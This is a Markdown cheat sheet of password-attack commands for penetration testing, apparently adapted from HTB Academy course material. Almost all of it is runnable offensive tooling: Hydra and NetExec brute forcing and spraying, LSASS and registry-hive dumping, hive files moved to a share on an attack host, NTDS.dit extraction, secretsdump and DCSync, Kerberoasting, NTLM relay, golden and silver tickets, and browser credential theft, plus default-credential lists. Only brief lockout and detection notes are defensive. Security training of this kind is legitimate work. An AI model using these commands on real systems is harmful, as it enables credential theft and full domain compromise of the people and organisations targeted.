password-attacks.md (22090B)
1 --- 2 title: "Password Attacks & Brute Forcing" 3 description: "Online/offline password attacks: Hydra/Medusa service brute-forcing, spraying, mutations and defaults." 4 category: password-attacks 5 tags: [password-attacks, brute-force, spraying] 6 tools: [Hydra, Medusa, CrackMapExec] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "repo:Password-Attacks/Password_Attacks_Cheat_Sheet.pdf" 10 --- 11 12 # Password Attacks & Brute Forcing 13 14 A comprehensive reference for password attack methodologies in authorized penetration testing: connecting to targets, building wordlists, remote and local credential attacks, hash cracking, and advanced Active Directory techniques. 15 16 > **Note — Impacket packaging.** Modern Impacket installs its example scripts with an `impacket-` prefix (`impacket-secretsdump`, `impacket-GetUserSPNs`, `impacket-GetNPUsers`, `impacket-ntlmrelayx`, `impacket-smbserver`, `impacket-psexec`, `impacket-getST`, `impacket-findDelegation`). The `python3 <script>.py` forms below still work from a source checkout. 17 18 ## Key Concepts 19 20 | Attack | Description | 21 | --- | --- | 22 | Brute force | Systematically trying all possible password combinations | 23 | Dictionary | Using wordlists of common passwords | 24 | Credential stuffing | Reusing compromised credentials across services | 25 | Pass-the-Hash | Using password hashes without cracking them | 26 | Password spraying | Trying common passwords against many accounts | 27 | Hash cracking | Converting password hashes back to plaintext | 28 29 ### Tools Overview 30 31 | Tool | Primary Use | 32 | --- | --- | 33 | Hydra | Network protocol brute-forcing | 34 | NetExec | Windows network authentication testing (formerly CrackMapExec) | 35 | Hashcat | GPU-accelerated hash cracking | 36 | John the Ripper | CPU-based hash cracking | 37 | Mimikatz | Windows credential extraction | 38 | Pypykatz | Python-based LSASS parsing | 39 40 ## 1. Connecting to Target 41 42 ```bash 43 # RDP (xfreerdp) 44 xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt! 45 46 # WinRM (Evil-WinRM) — supports pass-the-hash, PowerShell session 47 evil-winrm -i <ip> -u user -p password 48 49 # SSH 50 ssh user@<ip> 51 52 # SMB share (smbclient) 53 smbclient -U user \\\\<ip>\\SHARENAME 54 55 # Host an SMB share on the attack host (file transfer) 56 python3 smbserver.py -smb2support CompData /home/<user>/Documents/ 57 58 # SSH SOCKS proxy for pivoting 59 ssh -D 9050 user@<ip> 60 proxychains xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt! 61 ``` 62 63 ## 2. Password Mutations & Custom Wordlists 64 65 ```bash 66 # CeWL — scrape a website for keywords (-d depth, -m min length, --lowercase, -w output) 67 cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist 68 69 # Hashcat rule-based mutations (append numbers, capitalize, leetspeak, specials) 70 hashcat --force password.list -r custom.rule --stdout > mut_password.list 71 72 # Username-Anarchy — generate username permutations from first/last names 73 ./username-anarchy -i /path/to/listoffirstandlastnames.txt 74 75 # Build a compressed-file-extension list for file hunting 76 curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt 77 ``` 78 79 Common mutation rules: append numbers (`password` -> `password123`), capitalize first letter, leetspeak (`password` -> `p@ssw0rd`), append specials (`password!`), reverse (`drowssap`). 80 81 Generated username formats: `john.smith`, `j.smith`, `johns`, `john_smith`, `smithj`, `jsmith`. 82 83 > **Critical — tailor wordlists to the target.** Include company name/variations, product and service names, locations, industry terminology, common patterns (`Summer2024!`, `Welcome123`), OSINT employee names, and (when legally authorized) historical breach data. Generic wordlists have far lower success rates. 84 85 ## 3. Remote Password Attacks 86 87 ### NetExec (formerly CrackMapExec) 88 89 ```bash 90 # WinRM brute force 91 netexec winrm <ip> -u user.list -p password.list 92 93 # SMB share enumeration with creds 94 netexec smb <ip> -u "user" -p "password" --shares 95 96 # Dump SAM (requires admin) 97 netexec smb <ip> --local-auth -u <username> -p <password> --sam 98 99 # Dump LSA secrets (may contain cleartext creds / service passwords) 100 netexec smb <ip> --local-auth -u <username> -p <password> --lsa 101 102 # Dump NTDS.dit (Domain Controller only — full domain compromise) 103 netexec smb <ip> -u <username> -p <password> --ntds 104 ``` 105 106 ### Hydra — Multi-Protocol Brute Forcing 107 108 ```bash 109 # Username + password lists 110 hydra -L user.list -P password.list <service>://<ip> 111 112 # Single username, password list 113 hydra -l username -P password.list <service>://<ip> 114 115 # Single password, user list (spraying) 116 hydra -L user.list -p password <service>://<ip> 117 118 # Credential stuffing (user:pass pairs per line) 119 hydra -C <user_pass.list> ssh://<IP> 120 ``` 121 122 Supported services/ports: SSH (22), FTP (21), HTTP/HTTPS (80/443), SMB (445), RDP (3389), MySQL (3306), PostgreSQL (5432), MSSQL (1433), and many more. 123 124 ### Pass-the-Hash & Network Credential Extraction 125 126 ```bash 127 # Pass-the-Hash with Evil-WinRM (NTLM hash instead of password) 128 evil-winrm -i <ip> -u Administrator -H "<passwordhash>" 129 130 # Extract credentials from a packet capture 131 ./Pcredz -f demo.pcapng -t -v 132 ``` 133 134 Pass-the-Hash requirements: an NTLM hash (from SAM, NTDS, or memory dump), a target that accepts NTLM authentication, administrative privileges (recommended), and network connectivity. 135 136 ## 4. Windows Local Password Attacks 137 138 ### Process Enumeration & LSASS Dumping 139 140 ```powershell 141 # List processes and services 142 tasklist /svc 143 144 # Identify the LSASS process (note the PID) 145 Get-Process lsass 146 147 # Dump LSASS memory with comsvcs.dll (replace 672 with the LSASS PID; admin/SYSTEM) 148 rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full 149 150 # Parse the dump offline with Pypykatz 151 pypykatz lsa minidump /path/to/lsassdumpfile 152 ``` 153 154 ### Registry Hive Extraction 155 156 ```powershell 157 # Save SAM, SECURITY, SYSTEM hives (admin) 158 reg.exe save hklm\sam C:\sam.save 159 reg.exe save hklm\security C:\security.save 160 reg.exe save hklm\system C:\system.save 161 162 # Move to a network share 163 move sam.save \\<ip>\NameofFileShare 164 move security.save \\<ip>\NameofFileShare 165 move system.save \\<ip>\NameofFileShare 166 ``` 167 168 ```bash 169 # Extract hashes from the saved hives (Impacket) 170 python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL 171 ``` 172 173 ### NTDS.dit Extraction (Domain Controller) 174 175 ```powershell 176 # Create a volume shadow copy (Domain Admin or equivalent) 177 vssadmin CREATE SHADOW /For=C: 178 179 # Copy NTDS.dit from the shadow copy (replace the shadow identifier from vssadmin output) 180 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit 181 # Also extract the SYSTEM hive for the decryption keys. 182 ``` 183 184 ### Credential Manager 185 186 ```powershell 187 # Open the Credential Manager GUI 188 rundll32 keymgr.dll,KRShowKeyMgr 189 190 # List saved credentials in the current profile 191 cmdkey /list 192 193 # Launch cmd.exe as a stored user (works if creds saved with /savecred — no password needed) 194 runas /savecred /user:<username> cmd 195 ``` 196 197 ### File & Share Hunting 198 199 ```powershell 200 # Search files for the string "password" 201 findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml 202 203 # Snaffler — search network shares for sensitive files/creds 204 snaffler.exe -s 205 206 # PowerShell share hunting 207 Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public 208 ``` 209 210 ### Key Windows Credential Locations 211 212 | Location | Contains | Privileges | 213 | --- | --- | --- | 214 | LSASS Memory | NTLM hashes, cleartext passwords, Kerberos tickets | Admin | 215 | SAM Registry | Local user NTLM hashes | Admin | 216 | LSA Secrets | Service account passwords, cached credentials | Admin | 217 | NTDS.dit | All domain user password hashes | Domain Admin | 218 | Credential Manager | Stored credentials for various services | User/Admin | 219 220 ## 5. Linux Local Password Attacks 221 222 ### Configuration, Database & Document Hunting 223 224 ```bash 225 # Find configuration files 226 for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done 227 228 # Search config files for credentials (skip commented lines) 229 for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done 230 231 # Find database files 232 for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done 233 234 # Text / script / document files 235 find /home/* -type f -name "*.txt" -o ! -name "*.*" 236 for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done 237 for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done 238 ``` 239 240 ### Cron, SSH Keys, Bash History 241 242 ```bash 243 cat /etc/crontab 244 ls -la /etc/cron.*/ 245 246 # SSH keys system-wide / in home dirs / public keys 247 grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" 248 grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" 249 grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" 250 251 # Bash history 252 tail -n5 /home/*/.bash* 253 ``` 254 255 ### Memory & Browser Credential Extraction 256 257 ```bash 258 # Mimipenguin — plaintext creds from memory 259 python3 mimipenguin.py 260 bash mimipenguin.sh 261 262 # LaZagne — recover creds from browsers, email clients, databases 263 python2.7 lazagne.py all 264 python3 lazagne.py browsers 265 266 # Firefox stored credentials 267 ls -l .mozilla/firefox/ | grep default 268 cat .mozilla/firefox/1bp1pd86.default-release/logins.json | jq . 269 python3.9 firefox_decrypt.py 270 ``` 271 272 ### Key Linux Credential Locations 273 274 | Location | Contents | Risk | 275 | --- | --- | --- | 276 | `/etc/shadow` | Hashed user passwords (SHA-512, MD5) | Critical | 277 | `~/.ssh/` | SSH private keys | Critical | 278 | `~/.bash_history` | Command history with credentials | High | 279 | `*.conf`, `*.config` | Application credentials | High | 280 | `~/.mozilla` | Firefox stored passwords | Medium | 281 | `/var/log/` | Log files with authentication data | Medium | 282 | `*.py`, `*.sh` | Scripts with hardcoded credentials | High | 283 284 ## 6. Cracking Passwords 285 286 ### Hash Identification 287 288 Common formats: MD5 (32 hex), NTLM (32 hex, same length as MD5), SHA-1 (40 hex), SHA-256 (64 hex), bcrypt (starts `$2a$`/`$2b$`/`$2y$`), SHA-512 Unix (starts `$6$`). 289 290 ### Impacket Secretsdump 291 292 ```bash 293 # Local registry hives (SYSTEM holds the boot key to decrypt SAM/SECURITY) 294 python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL 295 296 # Remote SAM over the network (admin creds; no disk touch) 297 python3 secretsdump.py 'DOMAIN/user:password@<target-ip>' 298 299 # NTDS.dit remotely from a DC (all domain hashes — Domain Admin) 300 python3 secretsdump.py 'DOMAIN/Administrator:password@<dc-ip>' -just-dc 301 302 # Specific user only (e.g. krbtgt for Golden Ticket) 303 python3 secretsdump.py 'DOMAIN/Administrator:password@<dc-ip>' -just-dc-user krbtgt 304 305 # Pass-the-Hash (LM:NTLM, or leave LM empty with a leading colon) 306 python3 secretsdump.py 'DOMAIN/Administrator@<target-ip>' -hashes :aad3b435b51404eeaad3b435b51404ee 307 308 # Offline NTDS.dit (requires the SYSTEM hive too) 309 python3 secretsdump.py -ntds ntds.dit -system system.hive LOCAL 310 311 # Save output to files (hashes.ntds, hashes.ntds.kerberos, hashes.ntds.cleartext) 312 python3 secretsdump.py 'DOMAIN/user:password@<target>' -just-dc -outputfile hashes 313 ``` 314 315 | Option | Description | 316 | --- | --- | 317 | `-just-dc` | Extract NTDS.dit only (skip SAM/LSA) | 318 | `-just-dc-ntlm` | Extract only NTLM hashes, skip Kerberos | 319 | `-just-dc-user USERNAME` | Extract a specific user only | 320 | `-history` | Include password history hashes | 321 | `-user-status` | Show if an account is enabled/disabled | 322 | `-pwd-last-set` | Show password-last-set timestamp | 323 | `-exec-method METHOD` | Use smbexec, wmiexec, or mmcexec | 324 | `-use-vss` | Use Volume Shadow Copy for extraction | 325 326 ### Hashcat — GPU-Accelerated Cracking 327 328 ```bash 329 # NTLM (mode 1000) with wordlist 330 hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt 331 332 # Show the cracked plaintext for a hash 333 hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show 334 335 # Linux shadow (SHA-512, mode 1800) — combine passwd + shadow first 336 unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes 337 hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked 338 339 # MD5 (mode 500 = md5crypt) 340 hashcat -m 500 -a 0 md5-hashes.list rockyou.txt 341 342 # BitLocker (mode 22100) 343 hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked 344 ``` 345 346 | Mode | Hash Type | Notes | 347 | --- | --- | --- | 348 | 0 | MD5 | Extremely fast, weak | 349 | 100 | SHA-1 | Fast, deprecated | 350 | 1000 | NTLM | Windows password hashes | 351 | 1800 | SHA-512 (Unix) | Linux `/etc/shadow` | 352 | 3200 | bcrypt | Modern, intentionally slow | 353 | 5600 | NetNTLMv2 | Network authentication captures | 354 | 13100 | Kerberos TGS | Kerberoasting | 355 | 22000 | WPA/WPA2 | WiFi cracking | 356 | 22100 | BitLocker | Full disk encryption | 357 358 Attack modes: `-a 0` straight (dictionary), `-a 1` combination, `-a 3` brute-force/mask, `-a 6` hybrid wordlist+mask, `-a 7` hybrid mask+wordlist. 359 360 ### John the Ripper — File & Hash Cracking 361 362 ```bash 363 # SSH private key 364 python3 ssh2john.py SSH.private > ssh.hash 365 john ssh.hash --show 366 367 # Microsoft Office document 368 office2john.py Protected.docx > protecteddocx.hash 369 john --wordlist=rockyou.txt protecteddocx.hash 370 371 # PDF 372 pdf2john.pl PDF.pdf > pdf.hash 373 john --wordlist=rockyou.txt pdf.hash 374 375 # ZIP archive 376 zip2john ZIP.zip > zip.hash 377 john --wordlist=rockyou.txt zip.hash 378 379 # BitLocker volume (from VHD) 380 bitlocker2john -i Backup.vhd > backup.hashes 381 ``` 382 383 ### OpenSSL-Encrypted Archive 384 385 ```bash 386 file GZIP.gzip # identify the file type 387 # Brute force an OpenSSL-encrypted archive with a wordlist 388 for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done 389 ``` 390 391 > **Tip — cracking strategy.** 1) Start with common passwords (top 10k). 2) Apply rule-based mutations. 3) Use targeted, organization-specific wordlists. 4) Try hybrid attacks (wordlist + masks). 5) Reserve pure brute-force as a last resort. Relative crack speed (fastest first): MD5 > NTLM > SHA-1 > SHA-256 > SHA-512 > bcrypt. 392 393 Wordlist resources: `/usr/share/wordlists/rockyou.txt`, `/usr/share/seclists/`, `/usr/share/wordlists/`, plus custom lists from CeWL / username-anarchy / mutations. 394 395 ## 7. Advanced Attack Techniques 396 397 ### Kerberoasting 398 399 ```bash 400 # Request TGS tickets for all SPNs 401 python3 GetUserSPNs.py DOMAIN/user:password -dc-ip <DC-IP> -request 402 403 # Save directly in hashcat format 404 python3 GetUserSPNs.py DOMAIN/user:password -dc-ip <DC-IP> -request -outputfile kerberoast.hash 405 406 # Crack (mode 13100 = RC4-HMAC / Kerberos 5 TGS-REP etype 23; faster than AES) 407 hashcat -m 13100 kerberoast.hash rockyou.txt 408 ``` 409 410 ### AS-REP Roasting 411 412 ```bash 413 # Target accounts with "Do not require Kerberos preauthentication" 414 python3 GetNPUsers.py DOMAIN/ -dc-ip <DC-IP> -usersfile users.txt -format hashcat -outputfile asrep.hash 415 416 # Crack (mode 18200) 417 hashcat -m 18200 asrep.hash rockyou.txt 418 ``` 419 420 > **Warning —** AS-REP Roasting does not require valid credentials; vulnerable accounts can be enumerated without authentication if LDAP allows anonymous binds. 421 422 ### Password Spraying 423 424 > **Critical — account lockout awareness.** Identify the lockout threshold (typically 3-5 attempts) and duration (typically 15-30 minutes), calculate safe spray intervals, and monitor for lockouts during testing. 425 426 ```bash 427 # Smart spray across hosts (--continue-on-success tests all combos) 428 netexec smb targets.txt -u users.txt -p 'Password123!' --continue-on-success 429 430 # Time-based spray with delays between attempts 431 for pass in $(cat passwords.txt); do 432 echo "[+] Trying password: $pass" 433 netexec smb 10.10.10.10 -u users.txt -p "$pass" 434 echo "[*] Sleeping 30 minutes to avoid lockout..." 435 sleep 1800 436 done 437 ``` 438 439 ### DCSync 440 441 ```bash 442 # Mimikatz 443 mimikatz # lsadump::dcsync /domain:DOMAIN.COM /user:Administrator 444 mimikatz # lsadump::dcsync /domain:DOMAIN.COM /all 445 446 # Impacket 447 python3 secretsdump.py DOMAIN/user:password@DC-IP -just-dc 448 ``` 449 450 > **Critical —** DCSync requires Replicating Directory Changes (and All) permissions — typically Domain Admins, Enterprise Admins, or accounts with specific delegation rights. 451 452 ### Responder & NTLM Relay 453 454 ```bash 455 # Poison LLMNR/NBT-NS to capture NetNTLMv2 456 sudo responder -I eth0 -wFv 457 hashcat -m 5600 captured.hash rockyou.txt 458 459 # Relay captured auth to a target (requires SMB signing disabled) 460 python3 ntlmrelayx.py -tf targets.txt -smb2support 461 python3 ntlmrelayx.py -t 10.10.10.10 -smb2support -c "whoami" 462 ``` 463 464 ### Golden & Silver Tickets 465 466 ```bash 467 # Golden Ticket (requires krbtgt hash; valid up to 10 years by default) 468 mimikatz # kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:<KRBTGT_HASH> /id:500 /ptt 469 470 # Silver Ticket (service account hash; stealthier, limited to one service) 471 mimikatz # kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:SERVER.DOMAIN.COM /service:CIFS /rc4:<SERVICE_HASH> /ptt 472 ``` 473 474 ### Pass-the-Ticket (PtT) 475 476 ```bash 477 # Export / import tickets with Mimikatz 478 mimikatz # sekurlsa::tickets /export 479 mimikatz # kerberos::ptt ticket.kirbi 480 481 # Use a ticket with Impacket 482 export KRB5CCNAME=/path/to/ticket.ccache 483 python3 psexec.py -k -no-pass DOMAIN/user@target.domain.com 484 ``` 485 486 ### Constrained Delegation Abuse 487 488 ```bash 489 python3 findDelegation.py DOMAIN/user:password -dc-ip DC-IP 490 python3 getST.py -spn CIFS/target.domain.com -impersonate Administrator DOMAIN/service_account:password 491 ``` 492 493 ### Credential Guard Bypass 494 495 ```powershell 496 # ProcDump may still dump protected LSASS (often needs system-level access) 497 procdump64.exe -ma lsass.exe lsass.dmp 498 ``` 499 500 > **Note — Protected Users group restrictions:** no NTLM authentication, no DES/RC4 in Kerberos pre-auth, no credential delegation, TGT lifetime limited to 4 hours, cannot authenticate with unconstrained delegation. 501 502 ### Advanced Attack Tool Reference 503 504 | Tool | Purpose | Type | 505 | --- | --- | --- | 506 | GetUserSPNs.py | Kerberoasting — extract service tickets | Impacket | 507 | GetNPUsers.py | AS-REP Roasting — extract vulnerable hashes | Impacket | 508 | Responder | LLMNR/NBT-NS poisoning | Python | 509 | ntlmrelayx.py | NTLM credential relaying | Impacket | 510 | Mimikatz | Credential extraction, ticket manipulation | Windows | 511 | Rubeus | Kerberos abuse and ticket manipulation | C# | 512 | BloodHound | Active Directory attack path visualization | Neo4j | 513 | findDelegation.py | Identify delegation vulnerabilities | Impacket | 514 515 > **Detection —** activities likely to trigger alerts: excessive Kerberos ticket requests (Kerberoasting), AS-REP requests for multiple accounts, DCSync from non-DC systems, NTLM relay against disabled SMB signing, unusual PowerShell execution, abnormal LSASS access, lateral movement via Pass-the-Hash. 516 517 ## 8. Quick Reference 518 519 ### Tool Selection Matrix 520 521 | Target | Tool | Command | 522 | --- | --- | --- | 523 | SSH | Hydra | `hydra -L users -P pass.list ssh://IP` | 524 | RDP | Hydra | `hydra -L users -P pass.list rdp://IP` | 525 | WinRM | NetExec | `netexec winrm IP -u users -p pass.list` | 526 | SMB | NetExec | `netexec smb IP -u user -p pass.list` | 527 | FTP | Hydra | `hydra -l user -P pass.list ftp://IP` | 528 | HTTP | Hydra | `hydra -l user -P pass.list http-post-form://IP` | 529 530 ### Common Default Credentials 531 532 | Service | Username | Password | Notes | 533 | --- | --- | --- | --- | 534 | MySQL | root | (empty) | Default on many installations | 535 | PostgreSQL | postgres | postgres | Common default | 536 | Tomcat | admin | admin | Default manager webapp | 537 | Jenkins | admin | password | Common initial setup | 538 | Admin panels | admin | admin | Generic web applications | 539 | Router | admin | password | Consumer routers | 540 541 ### Port Reference 542 543 | Port | Service | Attack Vector | 544 | --- | --- | --- | 545 | 21 | FTP | Brute force, default credentials | 546 | 22 | SSH | Brute force, key-based attacks | 547 | 23 | Telnet | Brute force (cleartext) | 548 | 445 | SMB | Pass-the-Hash, credential stuffing | 549 | 3306 | MySQL | Brute force, default root account | 550 | 3389 | RDP | Brute force, credential stuffing | 551 | 5432 | PostgreSQL | Brute force, default postgres account | 552 | 5985/5986 | WinRM | Pass-the-Hash, password spray | 553 | 8080 | HTTP Alt | Web form attacks, default creds | 554 555 ### CeWL Wordlist Generation 556 557 ```bash 558 cewl https://example.com -w wordlist.txt # basic scraping 559 cewl https://example.com -d 5 -m 6 -w wordlist.txt # deep crawl, min length 6 560 cewl https://example.com -e --email_file emails.txt # include email addresses 561 cewl https://example.com -o --meta -w wordlist.txt # follow external links + metadata 562 ``` 563 564 ### Password Complexity Patterns 565 566 Common patterns to include in wordlists: Season+Year (`Summer2024!`, `Winter2023!`), Company+Year (`Inlanefreight2024!`), Welcome+Number (`Welcome123!`, `Welcome2024`), Location+Special (`NewYork!`, `California123`), Password+Special (`Password1!`, `P@ssw0rd!`), Month+Year (`January2024`, `March2023!`). 567 568 ### Essential Command Cheat Sheet 569 570 ```bash 571 # NetExec 572 netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' # password spray 573 netexec smb 10.10.10.10 -u admin -p pass --sam # dump SAM 574 netexec smb dc.domain.com -u admin -p pass --ntds # dump NTDS (DC) 575 netexec smb 10.10.10.10 -u admin -H <NTLM_HASH> # pass-the-hash 576 577 # Hydra 578 hydra -L users.txt -P pass.txt ssh://10.10.10.10 579 hydra -l admin -P pass.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" 580 hydra -l administrator -P pass.txt rdp://10.10.10.10 581 hydra -L users.txt -p Password123 ftp://10.10.10.10 582 583 # Hashcat 584 hashcat -m 1000 hashes.txt rockyou.txt 585 hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule 586 hashcat -m 1800 shadow.txt rockyou.txt 587 hashcat -m 1000 hashes.txt --show 588 589 # Impacket secretsdump 590 secretsdump.py -sam sam -security security -system system LOCAL 591 secretsdump.py 'DOMAIN/user:pass@10.10.10.10' 592 secretsdump.py 'DOMAIN/admin:pass@dc.domain.com' -just-dc 593 secretsdump.py 'DOMAIN/admin@10.10.10.10' -hashes :NTLM_HASH 594 ```